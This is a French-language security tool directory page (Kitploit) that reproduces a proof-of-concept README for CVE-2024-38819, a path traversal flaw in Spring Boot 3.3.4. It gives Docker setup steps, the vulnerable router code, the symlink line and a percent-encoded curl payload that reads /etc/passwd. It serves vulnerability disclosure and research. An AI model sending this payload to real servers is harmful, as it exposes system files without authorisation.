Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-38819-POC — Preuve de concept démontrant un exploit de traversée de chemin dans Spring Boot 3.3.4 via un lien symbolique et une traversée de répertoire encodée en pourcentage, pour la recherche en sécurité et l'éducation. | Kitploit
Outils/GitHubGitHub/masa42/cve-2024-38819-poc
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHubmasa42/cve-2024-38819-poc

CVE-2024-38819-POC

Preuve de concept démontrant un exploit de traversée de chemin dans Spring Boot 3.3.4 via un lien symbolique et une traversée de répertoire encodée en pourcentage, pour la recherche en sécurité et l'éducation.

Voir le dépôt
39151il y a 1 anVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2024-38819: Preuve de concept (PoC)

Ceci est une preuve de concept pour la vulnérabilité CVE-2024-38819, que j'ai signalée, démontrant un exploit de traversée de chemin.

Étapes d'exécution

  1. Construire l'image Docker (Spring Boot 3.3.4, basée sur Spring Framework 6.1.13)

    root@kitploit:~
    cd vuln
    docker build -t cve-2024-38819-poc .
    
  2. Exécuter le conteneur et exposer le port 8080 à la machine hôte

    root@kitploit:~
    docker run -d -p 8080:8080 --name cve-2024-38819-poc cve-2024-38819-poc
    
  3. Exécuter la commande suivante pour lancer le PoC et confirmer la vulnérabilité

    root@kitploit:~
    curl http://localhost:8080/static/link/%2e%2e/etc/passwd
    

    Si l'attaque réussit, le contenu du fichier /etc/passwd sera affiché.

Explication

  1. Créer PathTraversalDemoApplication.java avec le code suivant pour configurer le routage des fichiers statiques en utilisant et :

RouterFunction
FileSystemResource
root@kitploit:~
public RouterFunction<ServerResponse> staticResourceRouter() {
    return RouterFunctions.resources("/static/**", new FileSystemResource("/app/static/"));
}
  • Ajouter la commande suivante au Dockerfile pour créer un lien symbolique :

    root@kitploit:~
    RUN ln -s /static /app/static/link
    
  • Créer une charge utile qui utilise le pourcentage d'encodage pour traverser les répertoires via le lien symbolique.

    • Chemin : /static/link/%2e%2e/etc/passwd
  • Utiliser la commande curl suivante pour exécuter le PoC et vérifier si l'attaque réussit :

    root@kitploit:~
    curl http://localhost:8080/static/link/%2e%2e/etc/passwd
    

    Si l'attaque réussit, le contenu du fichier /etc/passwd sera affiché.

  • Avertissement

    Ce PoC est fourni à des fins éducatives et de recherche en sécurité. Avant de l'utiliser dans un système réel, assurez-vous que la vulnérabilité a été corrigée et que vous disposez des autorisations nécessaires. L'auteur décline toute responsabilité en cas d'utilisation abusive de ce code.

    Télécharger l’outil